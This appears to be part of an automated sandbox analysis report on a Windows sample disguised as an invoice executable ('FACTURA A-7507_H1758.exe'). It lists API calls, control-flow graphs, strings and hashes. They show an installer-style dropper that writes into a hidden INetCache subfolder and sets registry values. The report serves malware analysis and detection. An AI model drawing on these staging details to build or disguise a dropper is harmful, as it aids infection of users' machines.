404242 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 348->350 349->272 350->272 355 4041b3-4041cb ShowWindow call 40428e 350->355 355->281
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DA6
                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403DC3
                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403DD7
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF3
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403E14
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E28
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403E2F
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403EDD
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403EE7
                                                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403F01
                                                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F52
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403FF8
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00404019
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040402B
                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00404046
                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040405C
                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00404063
                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040407B
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040408E
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 004040B7
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00423728), ref: 004040CB
                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004041FF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                          • String ID: (7B
                                                                                                                                                                                                                          • API String ID: 3282139019-3251261122
                                                                                                                                                                                                                          • Opcode ID: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                                                                                                                                                                                          • Instruction ID: 4530f9416eb169af0d44378ddba5762a1eee688012323a74912104aead4a3b33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5C1FFB1640200FFCB206F61EE84E2B3AA8EB95745F40057EF641B21F1CB7999529B6D

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 358 4039c7-4039df call 406558 361 4039e1-4039f1 call 4060c5 358->361 362 4039f3-403a2a call 40604b 358->362 371 403a4d-403a76 call 403c9d call 405c3a 361->371 367 403a42-403a48 lstrcatW 362->367 368 403a2c-403a3d call 40604b 362->368 367->371 368->367 376 403b08-403b10 call 405c3a 371->376 377 403a7c-403a81 371->377 383 403b12-403b19 call 4061a0 376->383 384 403b1e-403b43 LoadImageW 376->384 377->376 378 403a87-403aaf call 40604b 377->378 378->376 385 403ab1-403ab5 378->385 383->384 387 403bc4-403bcc call 40140b 384->387 388 403b45-403b75 RegisterClassW 384->388 389 403ac7-403ad3 lstrlenW 385->389 390 403ab7-403ac4 call 405b5f 385->390 399 403bd6-403be1 call 403c9d 387->399 400 403bce-403bd1 387->400 391 403c93 388->391 392 403b7b-403bbf SystemParametersInfoW CreateWindowExW 388->392 396 403ad5-403ae3 lstrcmpiW 389->396 397 403afb-403b03 call 405b32 call 40617e 389->397 390->389 395 403c95-403c9c 391->395 392->387 396->397 403 403ae5-403aef GetFileAttributesW 396->403 397->376 411 403be7-403c01 ShowWindow call 4064e8 399->411 412 403c6a-403c72 call 4053b0 399->412 400->395 406 403af1-403af3 403->406 407 403af5-403af6 call 405b7e 403->407 406->397 406->407 407->397 419 403c03-403c08 call 4064e8 411->419 420 403c0d-403c1f GetClassInfoW 411->420 417 403c74-403c7a 412->417 418 403c8c-403c8e call 40140b 412->418 417->400 421 403c80-403c87 call 40140b 417->421 418->391 419->420 424 403c21-403c31 GetClassInfoW RegisterClassW 420->424 425 403c37-403c5a DialogBoxParamW call 40140b 420->425 421->400 424->425 429 403c5f-403c68 call 403917 425->429 429->395
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                                                                                                                                                                            • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000), ref: 00403A48
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,77233420), ref: 00403AC8
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403ADB
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403AE6
                                                                                                                                                                                                                          • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration), ref: 00403B2F
                                                                                                                                                                                                                            • Part of subcall function 004060C5: wsprintfW.USER32 ref: 004060D2
                                                                                                                                                                                                                          • RegisterClassW.USER32(004291E0), ref: 00403B6C
                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B84
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BB9
                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403BEF
                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403C1B
                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403C28
                                                                                                                                                                                                                          • RegisterClassW.USER32(004291E0), ref: 00403C31
                                                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403D6A,00000000), ref: 00403C50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                          • API String ID: 1975747703-3202460085
                                                                                                                                                                                                                          • Opcode ID: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                                                                                                                                                                                          • Instruction ID: e7f44595d902892b35b801f2f0c3734befc0b18a393fec54347386a87508d522
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8661C570244200BAD730AF669D49E2B3A7CEB84B49F40453FF981B62E2DB7D5912C63D

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 829 401767-40178c call 402bbf call 405ba9 834 401796-4017a8 call 40617e call 405b32 lstrcatW 829->834 835 40178e-401794 call 40617e 829->835 840 4017ad-4017ae call 406412 834->840 835->840 844 4017b3-4017b7 840->844 845 4017b9-4017c3 call 4064c1 844->845 846 4017ea-4017ed 844->846 854 4017d5-4017e7 845->854 855 4017c5-4017d3 CompareFileTime 845->855 847 4017f5-401811 call 405d53 846->847 848 4017ef-4017f0 call 405d2e 846->848 856 401813-401816 847->856 857 401885-4018ae call 4052dd call 4030e7 847->857 848->847 854->846 855->854 858 401867-401871 call 4052dd 856->858 859 401818-401856 call 40617e * 2 call 4061a0 call 40617e call 4058c3 856->859 871 4018b0-4018b4 857->871 872 4018b6-4018c2 SetFileTime 857->872 869 40187a-401880 858->869 859->844 891 40185c-40185d 859->891 874 402a55 869->874 871->872 873 4018c8-4018d3 CloseHandle 871->873 872->873 876 4018d9-4018dc 873->876 877 402a4c-402a4f 873->877 878 402a57-402a5b 874->878 880 4018f1-4018f4 call 4061a0 876->880 881 4018de-4018ef call 4061a0 lstrcatW 876->881 877->874 888 4018f9-40228d call 4058c3 880->888 881->888 888->878 891->869 894 40185f-401860 891->894 894->858
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn,?,?,00000031), ref: 004017A8
                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn,?,?,00000031), ref: 004017CD
                                                                                                                                                                                                                            • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrcatW.KERNEL32(00422708,00402E19,00402E19,00422708,00000000,00000000,00000000), ref: 00405338
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SetWindowTextW.USER32(00422708,00422708), ref: 0040534A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn$C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp$C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll$Call
                                                                                                                                                                                                                          • API String ID: 1941528284-3314272026
                                                                                                                                                                                                                          • Opcode ID: 691a1510b89acce80dd3805f8ce29c63c215ef208285089eafd6533280d8da0c
                                                                                                                                                                                                                          • Instruction ID: b64174440326d41e90dd14f1ad6608c73badddfa8ee8632f400ec40acf256ac3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 691a1510b89acce80dd3805f8ce29c63c215ef208285089eafd6533280d8da0c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C41C431900515BACF117FB5CC46DAE3679EF05329B20827BF422F51E2DA3C86629A6D

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 895 4025e5-4025fa call 402ba2 898 402600-402607 895->898 899 402a4c-402a4f 895->899 901 402609 898->901 902 40260c-40260f 898->902 900 402a55-402a5b 899->900 901->902 904 402773-40277b 902->904 905 402615-402624 call 4060de 902->905 904->899 905->904 908 40262a 905->908 909 402630-402634 908->909 910 4026c9-4026cc 909->910 911 40263a-402655 ReadFile 909->911 913 4026e4-4026f4 call 405dd6 910->913 914 4026ce-4026d1 910->914 911->904 912 40265b-402660 911->912 912->904 915 402666-402674 912->915 913->904 922 4026f6 913->922 914->913 916 4026d3-4026de call 405e34 914->916 919 40267a-40268c MultiByteToWideChar 915->919 920 40272f-40273b call 4060c5 915->920 916->904 916->913 919->922 923 40268e-402691 919->923 920->900 926 4026f9-4026fc 922->926 927 402693-40269e 923->927 926->920 929 4026fe-402703 926->929 927->926 930 4026a0-4026c5 SetFilePointer MultiByteToWideChar 927->930 931 402740-402744 929->931 932 402705-40270a 929->932 930->927 933 4026c7 930->933 935 402761-40276d SetFilePointer 931->935 936 402746-40274a 931->936 932->931 934 40270c-40271f 932->934 933->922 934->904 937 402721-402727 934->937 935->904 938 402752-40275f 936->938 939 40274c-402750 936->939 937->909 940 40272d 937->940 938->904 939->935 939->938 940->904
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
                                                                                                                                                                                                                            • Part of subcall function 00405E34: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E4A
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                                                                                                          • Opcode ID: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
                                                                                                                                                                                                                          • Instruction ID: fbd7f9394f7a40dbbdef10ea3a20ac1ae57b35180e29dd1ddeb30b88b5afce05
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19510774D00219ABDF209F94CA88AAEB779FF04344F50447BE501B72E0D7B99982DB69

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 941 4057ac-4057f7 CreateDirectoryW 942 4057f9-4057fb 941->942 943 4057fd-40580a GetLastError 941->943 944 405824-405826 942->944 943->944 945 40580c-405820 SetFileSecurityW 943->945 945->942 946 405822 GetLastError 945->946 946->944
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405803
                                                                                                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405818
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405822
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D2
                                                                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 004057AC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                                          • API String ID: 3449924974-26219170
                                                                                                                                                                                                                          • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                                                                                                                                                                                          • Instruction ID: b278f7ea68de5888e34302da86fdb06c438f4ef9b03e74a9ab654546e4f81ce2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89010871D00619DADF10DBA0D9447EFBFB8EB04304F00803ADA44B6190E7789618DFA9

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 947 4064e8-406508 GetSystemDirectoryW 948 40650a 947->948 949 40650c-40650e 947->949 948->949 950 406510-406519 949->950 951 40651f-406521 949->951 950->951 952 40651b-40651d 950->952 953 406522-406555 wsprintfW LoadLibraryExW 951->953 952->953
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 0040653A
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040654E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                          • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                                                                                                                                                                                          • Instruction ID: c6b4a3c42f63eea3762d57d51081eb848d485012b63e63803453d9912f42ff06
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AF0FC70500219BADB10AB64ED0DF9B366CAB00304F10403AA646F10D0EB7CD725CBA8

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 954 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 961 4023c7-4023cf 954->961 962 402a4c-402a5b 954->962 964 4023d1-4023de call 402bbf lstrlenW 961->964 965 4023e2-4023e5 961->965 964->965 967 4023f5-4023f8 965->967 968 4023e7-4023f4 call 402ba2 965->968 972 402409-40241d RegSetValueExW 967->972 973 4023fa-402404 call 4030e7 967->973 968->967 976 402422-4024fc RegCloseKey 972->976 977 40241f 972->977 973->972 976->962 979 40281e-402825 976->979 977->976 979->962
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                                          Strings
